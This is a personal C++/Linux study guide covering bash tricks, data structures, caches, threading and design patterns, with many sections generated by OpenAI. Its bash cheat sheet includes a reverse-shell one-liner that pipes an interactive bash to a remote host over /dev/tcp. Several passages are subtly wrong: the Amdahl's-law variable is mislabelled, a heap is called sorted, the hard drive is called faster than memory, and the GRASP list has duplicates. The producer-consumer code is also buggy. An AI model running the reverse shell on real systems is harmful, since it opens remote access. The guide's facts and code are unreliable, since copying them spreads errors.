Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Fri Jun 14 22:05:51 UTC 2024

Forward

An ode to C++

Let’s start with a haiku written by a computer.

Compiling code runs
C++ language flows strong
Programs come to life

This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.


Parallelism

Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycles

Amdahl’s law

Amdahl’s law is a principle in computer architecture that describes the potential speedup of a system when only part of it is improved. It was developed by computer scientist Gene Amdahl in 1967 and is often used to evaluate the impact of parallel processing on overall system performance.

The law states that the overall speedup of a system is limited by the portion of the system that cannot be parallelized or improved. This portion is often referred to as the "serial" or "sequential" part of the system. In other words, even if a system’s parallel processing capabilities are improved, the overall speedup will be limited by the sequential portion of the system.

Mathematically, Amdahl’s law can be expressed as:

S(n) = 1 / (α + (1 - α)/n)

Where: - S(n) is the speedup achieved by using n processors - α is the proportion of the system that can be parallelized - (1 - α) is the proportion of the system that remains sequential

This formula shows that as the number of processors (n) increases, the speedup achieved by parallel processing approaches a maximum value of 1/α. This means that even with an infinite number of processors, the speedup will never be greater than 1/α.

Amdahl’s law highlights the importance of optimizing the sequential portion of a system in order to achieve maximum speedup. It also serves as a reminder that adding more processors to a system may not always result in significant performance gains if the sequential portion is not improved.

In practical terms, Amdahl’s law can be used to determine the potential speedup of a system before investing time and resources into parallelizing it. It can also be used to identify which portions of a system should be prioritized for optimization in order to achieve the greatest overall speedup.

It’s very tempting to optimise the parts your are familiar with, but it’s not obvious how much your efforts will benefit the overall process. Spend your time on the bottlenecks.


bash

As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.

git

git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.

echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876

uptime

The three load average values are 1, 5 and 15 minutes.

uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51

stress

Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -

Hash functions

A hash function is a mathematical function that takes in data of any size and converts it into a fixed-size output, also known as a hash value or hash code. This output is usually a string of numbers and letters that serves as a unique digital fingerprint for the input data. Hash functions are commonly used in computer science for data storage, data retrieval, and data verification. They are also used in cryptography to secure data and in data structures such as hash tables for efficient data lookup. A good hash function should be deterministic, meaning that the same input will always produce the same output, and it should be computationally efficient, meaning that it should be quick to compute the hash value for any given input.

Properties of a hashing algorithm

String hashing


Complexity

You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Description
O(1) Constant time
O(log n) Logarithmic time
O(n) Linear time
O(n log n) Linearithmic time
O(n^2) Quadratic time
O(n^3) Cubic time
O(2^n) Exponential time
O(n!) Factorial time

Comparing two fundamental data structures

The average complexity of linked lists and arrays varies depending on the specific operations being performed on them. However, in general, linked lists and arrays have different average complexities for different operations.

  1. Accessing Elements: The average complexity of accessing an element in an array is O(1) as the elements are stored in contiguous memory locations, making it easy to access a specific element using its index. On the other hand, the average complexity of accessing an element in a linked list is O(n) as it requires traversing the list from the head or tail to the desired element.

  2. Insertion/Deletion: The average complexity of inserting or deleting an element at the beginning or end of an array is O(n) as it requires shifting all the subsequent elements. However, inserting or deleting an element at the beginning or end of a linked list has an average complexity of O(1) as it only requires updating the head or tail pointer.

  3. Insertion/Deletion in the middle: Inserting or deleting an element in the middle of an array has an average complexity of O(n) as it requires shifting all the subsequent elements. In a linked list, the average complexity is O(n) as it requires traversing the list to the desired position.

  4. Searching: The average complexity of searching for an element in an unsorted array is O(n) as all the elements need to be checked. In a linked list, the average complexity is also O(n) as it requires traversing the list to find the desired element.

Overall, the average complexity of linked lists and arrays depends on the specific operations being performed. However, in general, arrays have a lower average complexity for accessing elements, while linked lists have a lower average complexity for inserting/deleting elements. Both have the same average complexity for searching.


Data structures

It’s important to know the common data structures and their characteristics.

  1. Arrays
  2. Linked Lists
  3. Stacks
  4. Queues
  5. Trees
  6. Graphs
  7. Hash Tables
  8. Heaps
  9. Tries
  10. Sets
  11. Maps
  12. Dictionaries
  13. Bags
  14. Deques
  15. Priority Queues

std::vector

std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {

        // Constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        };

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
        std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}
}

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all of the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead; also, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an amortized complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is unbalanced, then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

A binary search tree is a data structure that is used to store and organize data in a hierarchical manner. It is a type of binary tree, which means that each node has at most two child nodes. The nodes in a binary search tree are organized in a specific way – the left child node of a parent node is always smaller than the parent node, and the right child node is always greater than the parent node.

This organization of nodes makes it easy to search for a specific value in the tree. Starting at the root node, the search algorithm compares the value being searched for to the value in the current node. If the value is smaller, the algorithm moves to the left child node. If the value is larger, the algorithm moves to the right child node. This process continues until the value is found or the algorithm reaches a leaf node (a node with no children).

Binary search trees also have efficient insertion and deletion operations. When inserting a new value into the tree, the algorithm compares the value to the current node and decides whether it should be placed as a left or right child node. This process continues until the value is inserted into the correct position.

Deletion in a binary search tree can be done in three different cases: deleting a leaf node, deleting a node with one child, and deleting a node with two children. In each case, the algorithm rearranges the tree to maintain the binary search tree property.

Overall, binary search trees are efficient data structures for storing and retrieving data in a sorted manner. However, they can become unbalanced if the data is not inserted in a balanced manner, which can affect the performance of search operations. To maintain balance, various balance techniques such as AVL trees and red-black trees can be used.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.

Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.

123456789abcedef
1
23
4567
89abcdef

Project down, the top of the tree is a smallest element.

       1
   2       3
 4   5   6   7
8 9 a b c d e f
       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a data structure that is typically implemented as an array and follows the heap property, which states that the parent node must be either greater than or equal to (for a max heap) or less than or equal to (for a min heap) its child nodes. This structure is used for efficient access to the maximum (or minimum) element in the data, making it useful for priority queues.

On the other hand, a binary search tree (BST) is a data structure that is organized as a binary tree, with each node having at most two child nodes (left and right). The BST follows the property that all nodes in the left subtree of a node are less than the node, and all nodes in the right subtree are greater than the node. This structure is used for efficient searching, insertion, and deletion of elements in sorted order.

In summary, the main differences between a heap and a binary search tree are:

  1. Structure: A heap is typically implemented as an array, while a binary search tree is organized as a binary tree.

  2. Heap property vs. BST property: A heap follows the heap property, while a binary search tree follows the BST property.

  3. Ordering of elements: In a heap, the parent node is either greater than or equal to its child nodes, while in a binary search tree, the left subtree contains elements smaller than the node, and the right subtree contains elements greater than the node.

  4. Purpose: A heap is typically used for efficient access to the maximum or minimum element, while a binary search tree is used for efficient searching, insertion, and deletion of elements in sorted order.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Type Average Case Time Complexity Worst Case Time Complexity
Vector O(1) O(n)
List O(1) O(n)
Deque O(1) O(n)
Set O(log n) O(n)
Map O(log n) O(n)
Multiset O(log n) O(n)
Multimap O(log n) O(n)
Unordered_set O(1) O(n)
Unordered_map O(1) O(n)
Unordered_multiset O(1) O(n)
Unordered_multimap O(1) O(n)
Stack O(1) O(n)
Queue O(1) O(n)
Priority_queue O(log n) O(n)
Bitset O(1) O(1)

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.


Caches

A cache is a small amount of unusually fast memory.

A modern multi-core machine will have a multi-level cache hierarchy, where the faster and smaller caches belong to individual processors. When one processor modifies a value in its cache, other processors cannot use the old value any more; and that memory location will be invalidated in all of the caches. Furthermore, since caches operate on the granularity of cache lines and not individual bytes, the entire cache line will be invalidated in all caches.

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order”.

OpenAI: Processor caches are small, high-speed memory units that are located on the processor itself. They are used to temporarily store frequently used data and instructions to speed up the processor’s performance. There are typically three levels of processor caches: L1, L2, and L3.

L1 cache is the smallest and fastest cache, with a capacity of a few kilobytes. It is directly integrated into the processor core and operates at the same speed as the processor. L1 cache is divided into two parts: instruction cache and data cache. The instruction cache stores frequently used instructions, while the data cache stores frequently accessed data.

L2 cache is larger than L1 cache and is also located on the processor chip. Its capacity can range from a few hundred kilobytes to a few megabytes. L2 cache is slower than L1 cache, but still operates at a much faster speed than main memory. It acts as a middleman between the L1 cache and main memory, storing data and instructions that are not currently in the L1 cache.

L3 cache is the largest of the three levels and is located either on the processor chip or on a separate chip on the motherboard. Its capacity can range from a few megabytes to tens of megabytes. L3 cache is slower than L2 cache, but still faster than main memory. It acts as a backup for the L1 and L2 caches, storing data and instructions that are not frequently used.

The use of processor caches greatly improves the performance of a computer system by reducing the time it takes for the processor to retrieve data and instructions from main memory. This is because the processor can access data and instructions from the caches much faster than it can from main memory. Additionally, the caches also help to reduce the amount of traffic on the system bus, allowing for more efficient communication between the processor and main memory.

Cache consistency

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order.

Cache coherence

OpenAI: Cache coherence is a property of a multi-core computer system that ensures that updates to shared data in the cache of one processor are propagated to the cache of all other processors in a timely manner. This ensures that all processors in the system have consistent and up-to-date data, even when multiple processors are accessing and modifying the same data.

In a multi-core system, each processor has its own cache memory that stores frequently used data for faster access. When multiple processors access the same data, there is a possibility that one processor may have a different version of the data in its cache than another processor. This can lead to data inconsistencies and errors.

Cache coherence protocols are used to manage the shared data and ensure that all processors have the most recent version of the data. These protocols use various techniques such as snooping, directory-based schemes, and shared bus architectures to maintain data consistency.

Snooping is a commonly used technique where each processor monitors the bus for any updates to shared data. If a processor detects that another processor has modified a shared data item, it will invalidate its own copy of the data and fetch the updated version from the main memory or the other processor’s cache.

Directory-based schemes use a centralized directory that keeps track of which processor has a valid copy of a shared data item. When a processor wants to access a shared data item, it first checks the directory to determine which processor has the most recent version. If another processor has the data, the requesting processor can fetch the data from that processor’s cache.

Shared bus architectures use a shared communication bus to transfer data between processors. Each processor has its own cache, but they all share a common bus to access the main memory. This allows for direct communication between processors and ensures that all processors have consistent data.

Cache coherence is essential in multi-core systems to maintain data consistency and prevent errors. Without it, the performance and reliability of the system could be severely impacted.

MESI cache coherence protocol

Each cache line has state, tag, data.

Snooping

See bus snooping.

Directory based coherence

Used for large CPUs.

See wiki.

Write-back versus write-through

All Intel-compatible CPUs during the last one/two decades used a write-back strategy for caches (which presumes fetching a cache line first to allow partial writes). Of course that’s the theory, reality is slightly more complex than that.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

OpenAI: A cache miss occurs when the processor or CPU tries to access data from the cache memory, but the requested data is not found in the cache. This means that the data must be retrieved from a slower, larger memory source, such as the main memory or hard drive.

Cache misses can significantly impact the performance of a system because accessing data from the main memory or hard drive is much slower compared to accessing data from the cache. This delay in retrieving data can cause a delay in processing instructions and can result in slower overall performance.

Cache misses can occur for various reasons, such as:

  1. Compulsory miss: This occurs when the requested data is being accessed for the first time and is not yet present in the cache.

  2. Capacity miss: This occurs when the cache is full and cannot hold any more data, causing the data to be evicted from the cache and requiring it to be retrieved from the main memory.

  3. Conflict miss: This occurs when the requested data is still present in the cache, but due to the cache’s mapping function, it is not accessible and must be retrieved from the main memory.

Cache misses can also be caused by poorly written code or inefficient algorithms that lead to frequent and unnecessary data access requests, resulting in a higher number of cache misses. To improve system performance, programmers and developers need to optimize their code and reduce the number of cache misses.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

CRTP

The curiously recurring template pattern (CRTP) is an idiom in C++ in which a class X derives from a class template instantiation using X itself as template argument. More generally it is known as F-bound polymorphism, and it is a form of static polymorphism.

// Base class template using CRTP
template<typename Derived>
class Base {
public:
    void foo() {
        static_cast<Derived*>(this)->fooImpl();
    }
};

// Derived class using CRTP
class Derived : public Base<Derived> {
public:
    void fooImpl() {
        // Implementation of foo specific to Derived
        std::cout << "Hello from Derived!" << std::endl;
    }
};

Cache performance evaluate

Cache associativity

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Profiling

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

CPI_stall contributors

Cache locality

Cache locality refers to the principle of keeping frequently accessed data or instructions physically close to each other in a computer’s memory. This helps improve the performance of the system by reducing the time it takes to access data, as data can be retrieved from the nearby cache rather than from the main memory.

There are two types of cache locality: temporal locality and spatial locality. Temporal locality refers to the tendency of a program to access the same data or instructions repeatedly in a short period of time. This allows the system to keep the data in the cache, making it faster to access in subsequent requests. Spatial locality, on the other hand, refers to the tendency of a program to access data that is located near the data that was recently accessed. This allows the system to prefetch data and store it in the cache, anticipating that it will be needed soon.

Cache locality is important for efficient memory management and can significantly improve the performance of a system. It is often achieved through techniques such as caching, prefetching, and memory mapping. However, cache locality can also be negatively affected by thrashing, where the system is constantly swapping data in and out of the cache, leading to slower performance.

Further watching

TLB: Translation lookaside buffer

The Translation Lookaside Buffer (TLB) is a hardware cache that is used in computer systems to improve the efficiency of virtual memory address translation. It is a small, high-speed cache that stores recently used virtual-to-physical address translations.

When a program references a memory location, the virtual memory address needs to be translated into a physical memory address by the operating system. This translation process involves looking up a page table or a similar data structure. Since this translation operation is performed frequently, it can introduce overhead and impact system performance.

The TLB acts as a cache for these translations, reducing the need for repeated lookups in the page table. It stores a subset of the most recently used translations, making it faster to access and retrieve the corresponding physical memory address.

TLBs can be shared between multiple cores or processors, or each core may have its own dedicated TLB.

OpenAI: Translation Lookaside Buffer (TLB) is a cache memory that is used to improve the efficiency of virtual memory operations. It stores recently used virtual-to-physical address translations, allowing the processor to quickly access the corresponding physical memory address without having to perform a full translation process. The TLB acts as a temporary storage for translations, reducing the time and effort required for memory access. It is typically located on the processor chip and is used in conjunction with the Memory Management Unit (MMU) to handle virtual address translations. The TLB is an important component in modern computer systems and plays a key role in improving system performance.

Memory fences

A memory fence (or barrier) is a programming language construct used to enforce an ordering constraint on memory operations issued by a thread of execution on a CPU. This typically means that operations issued prior to the fence are guaranteed to be performed before operations issued after the fence.

const int num_mailboxes = 32;
std::atomic<int> mailbox_receiver[num_mailboxes];
std::string mailbox_data[num_mailboxes];
 
// The writer threads update non-atomic shared data 
// and then update mailbox_receiver[i] as follows:
mailbox_data[i] = ...;
std::atomic_store_explicit(&mailbox_receiver[i], receiver_id, std::memory_order_release);
 
// Reader thread needs to check all mailbox[i], but only needs to sync with one.
for (int i = 0; i < num_mailboxes; ++i)
    if (std::atomic_load_explicit(&mailbox_receiver[i],
        std::memory_order_relaxed) == my_id)
    {
        // synchronize with just one writer
        std::atomic_thread_fence(std::memory_order_acquire);
        // guaranteed to observe everything done in the writer thread
        // before the atomic_store_explicit()
        do_work(mailbox_data[i]);
    }

See wiki and cppreference.

What pushes something out of the cache?

There are several factors that can push something out of the cache:

  1. Cache size limitations: Caches have a limited capacity, and if the cache becomes full, the least recently used (LRU) items are typically pushed out to make space for new entries.
  2. Cache eviction policies: Various cache eviction policies determine what gets pushed out when the cache is full. LRU (Least Recently Used) is one of the commonly used policies that evicts the oldest item that has not been accessed recently.
  3. Time-based expiration: Some caches may have a time-based expiration mechanism. If an item remains unused for a certain period of time, it can be automatically removed from the cache to make room for other data.
  4. Size-based eviction: In some cases, if the cache is designed to store items of a fixed size, new entries may replace older items when they exceed the cache’s size limit.
  5. Manual cache invalidation: Cache invalidation can be triggered manually by a programmer or system administrator. This is often done to ensure that the cache is up-to-date with the latest data, or to remove specific items from the cache.

Further reading

C++ linkage

Internal linkage refers to the visibility of a variable or function within a single source file. Variables or functions with internal linkage can only be accessed within the source file they are declared in, and cannot be accessed by other source files in the same project.

External linkage refers to the visibility of a variable or function across multiple source files in a project. Variables or functions with external linkage can be accessed by other source files in the same project, allowing for sharing and reusing of code.

In C++, variables and functions have external linkage by default, but can be declared with the keyword "static" to have internal linkage. Additionally, the "extern" keyword can be used to explicitly declare a variable or function with external linkage.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.

http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco

If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namepsaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform dependent interface. See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?

Ways to create a thread

std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. It’s quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads: they will just be executed sequentially. Additionally, exceptions thrown in the asynchronous routine destroy the future and the exception is rethrown by the calling get() routine. You ought to pass it a strategy: std::launch::async or std::launch::deferred as a first parameter.

std::thread

You need to call join() for every thread created with std::thread. This can be done by storing your threads as a vector and joining each of them in a loop.

std::jthread

Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes a additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources

std::mutex

A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or single, but also I think it expresses intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

{
  "id": "cmpl-9a9IeKqSPXwDIkgyi4rytvKc5yzci",
  "object": "text_completion",
  "created": 1718402584,
  "model": "gpt-3.5-turbo-instruct",
  "choices": [
    {
      "text": "
Producer-Consumer Solution in C++

// Define the buffer size
#define BUFFER_SIZE 5

// Define the maximum number of items to be produced
#define MAX_ITEMS 20 

// Define mutex and semaphore
sem_t empty, full;
pthread_mutex_t mutex;

// Define buffer array
int buffer[BUFFER_SIZE];

// Define variable for tracking the number of items produced
int item_count = 0;

// Function to produce items
void *producer(void *arg) {
    int item = 1;
    while (item_count < MAX_ITEMS) {
        // Wait for an empty slot in the buffer
        sem_wait(&empty);

        // Lock the mutex before accessing the buffer
        pthread_mutex_lock(&mutex);

        // Add item to buffer
        buffer[item_count] = item;
        item_count++;

        // Print the item produced
        cout << \"Produced item: \" << item << endl;

        // Unlock the mutex and signal that the buffer is full
        pthread_mutex_unlock(&mutex);
        sem_post(&full);

        // Increment item
        item++;
    }
}

// Function to consume items
void *consumer(void *arg) {
    int item;
    while (true) {
        // Wait for a full slot in the buffer
        sem_wait(&full);

        // Lock the mutex before accessing the buffer
        pthread_mutex_lock(&mutex);

        // Get item from buffer
        item = buffer[item_count - 1];
        item_count--;

        // Print the item consumed
        cout << \"Consumed item: \" << item << endl;

        // Unlock the mutex and signal that the buffer is empty
        pthread_mutex_unlock(&mutex);
        sem_post(&empty);

        // If all items have been consumed, exit loop
        if (item_count == 0) {
            break;
        }
    }
}

int main() {
    // Initialize mutex and semaphores
    pthread_mutex_init(&mutex, NULL);
    sem_init(&empty, 0, BUFFER_SIZE);
    sem_init(&full, 0, 0);

    // Create producer and consumer threads
    pthread_t producer_thread, consumer_thread;
    pthread_create(&producer_thread, NULL, producer, NULL);
    pthread_create(&consumer_thread, NULL, consumer, NULL);

    // Join threads
    pthread_join(producer_thread, NULL);
    pthread_join(consumer_thread, NULL);

    // Destroy mutex and semaphores
    pthread_mutex_destroy(&mutex);
    sem_destroy(&empty);
    sem_destroy(&full);

    return 0;
}",
      "index": 0,
      "logprobs": null,
      "finish_reason": "stop"
    }
  ],
  "usage": {
    "prompt_tokens": 9,
    "completion_tokens": 527,
    "total_tokens": 536
  }
}

SOLID

  1. Single Responsibility Principle (SRP)
  2. Open/Closed Principle (OCP)
  3. Liskov Substitution Principle (LSP)
  4. Interface Segregation Principle (ISP)
  5. Dependency Inversion Principle (DIP)

GRASP

Less common but another set of principles to consider.

  1. Information Expert: Assign responsibilities to the class that has the most information required to fulfill them.
  2. Creator: Assign the responsibility to create objects to the class that has the required information to do so.
  3. Controller: Assign the responsibility of managing the flow of information between objects to a separate controller class.
  4. Low Coupling: Design classes with minimal dependencies on each other to avoid tight coupling.
  5. High Cohesion: Design classes with a clear, single purpose to increase cohesion within the class.
  6. Polymorphism: Use polymorphism to allow for different behaviors to be implemented by objects of the same class.
  7. Pure Fabrication: Create separate classes to handle complex or specialized tasks that do not fit into existing classes.
  8. Indirection: Use intermediate classes to reduce direct coupling between classes.
  9. Protected Variations: Design classes to protect them from changes in external systems or dependencies.
  10. Pure Fabrication: Create separate classes to handle complex or specialized tasks that do not fit into existing classes.
  11. Controller: Assign the responsibility of managing the flow of information between objects to a separate controller class.
  12. Creator: Assign the responsibility to create objects to the class that has the required information to do so.
  13. Information Expert: Assign responsibilities to the class that has the most information required to fulfill them.
  14. Low Coupling: Design classes with minimal dependencies on each other to avoid tight coupling.
  15. High Cohesion: Design classes with a clear, single purpose to increase cohesion within the class.

C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {
}

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) {
}

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {
}

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {
}

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};

What are the most difficult concepts in computer science?


Virtual memory

OpenAI: 1. Increased memory capacity: Virtual memory allows a computer to address more memory than it physically has available. This increases the overall memory capacity of the system and allows it to run larger programs or multiple programs simultaneously.

  1. Efficient memory management: Virtual memory allows the computer to manage memory more efficiently by storing data and instructions in the hard drive and only loading them into physical memory when needed. This frees up physical memory for other tasks and reduces the chances of running out of memory.

  2. Cost-effective: Virtual memory reduces the need for expensive physical memory by utilizing the hard drive space as an extension of the physical memory. This makes it a cost-effective solution for increasing memory capacity.

  3. Better multitasking: With virtual memory, a computer can run multiple programs simultaneously without running out of physical memory. This improves the multitasking capabilities of the system and allows for smoother switching between applications.

  4. Enhanced system performance: Virtual memory can improve system performance by reducing the amount of time it takes to access data and instructions. By using virtual memory, the computer can access data and instructions stored in the hard drive faster than it would if it had to retrieve them from a physical memory location.

  5. Increased stability: Virtual memory can improve the stability of a system by preventing a single program from using up all the physical memory. If a program tries to use more memory than is available, virtual memory can allocate additional space from the hard drive, preventing the system from crashing.

  6. Flexibility: Virtual memory allows for flexibility in memory allocation. It can allocate more or less memory to specific programs based on their needs, allowing the system to optimize memory usage and performance.

  7. Support for larger programs: Virtual memory allows for the execution of larger programs that require more memory than what is physically available. This is particularly useful for applications that handle large amounts of data, such as video editing or 3D modeling software.

  8. Compatibility: Virtual memory is a standard feature in most modern operating systems, making it compatible with a wide range of computer systems. This allows for easy integration and use of virtual memory in various computing environments.

  9. Easy maintenance: Virtual memory is managed by the operating system, so users do not need to manually manage memory. This makes it easier to maintain and reduces the chances of memory-related errors or crashes. ___

Design patterns

The objective of design patterns is to provide well-tested and proven solutions to commonly occurring design problems in software development. These patterns provide a standard and reusable approach to designing software, making it easier to maintain, modify, and extend code. They also help in improving code readability and reducing development time, as developers can use the established patterns instead of creating new solutions from scratch. Additionally, design patterns promote best practices and encourage consistency in design, making it easier for developers to collaborate and understand each other’s code. The ultimate goal of design patterns is to produce high-quality, flexible, and maintainable software that meets the requirements of the end-users.

Categories

Common patterns

  1. Singleton Pattern: Ensures that only one instance of a class is created and provides a global access point to that instance.

  2. Factory Pattern: Used to create objects without exposing the creation logic to the client. It provides a way to create objects based on a common interface or parent class.

  3. Observer Pattern: Defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified and updated automatically.

  4. Adapter Pattern: Allows the interface of an existing class to be used as another interface. It is often used to make incompatible classes work together.

  5. Decorator Pattern: Allows behavior to be added to an individual object without affecting the behavior of other objects from the same class. It is often used to dynamically add new functionality to an object.

  6. Strategy Pattern: Defines a family of algorithms, encapsulates each one, and makes them interchangeable. It allows the algorithm to be selected at runtime without tightly coupling the client to the implementation.

  7. Template Method Pattern: Defines the skeleton of an algorithm in a method, allowing subclasses to provide some of the implementation details. It is often used to avoid duplication of code in similar algorithms.

  8. Iterator Pattern: Provides a way to access the elements of an aggregate object sequentially without exposing its underlying representation.

  9. Command Pattern: Encapsulates a request as an object, allowing it to be invoked at a later time. It also allows requests to be queued, logged, or undone.

  10. Facade Pattern: Provides a unified interface to a set of interfaces in a subsystem. It simplifies the interface of a complex system by providing a higher-level interface.

  11. Proxy Pattern: Provides a surrogate or placeholder for another object to control access to it. It is often used to add extra functionality to an object or to control its creation.

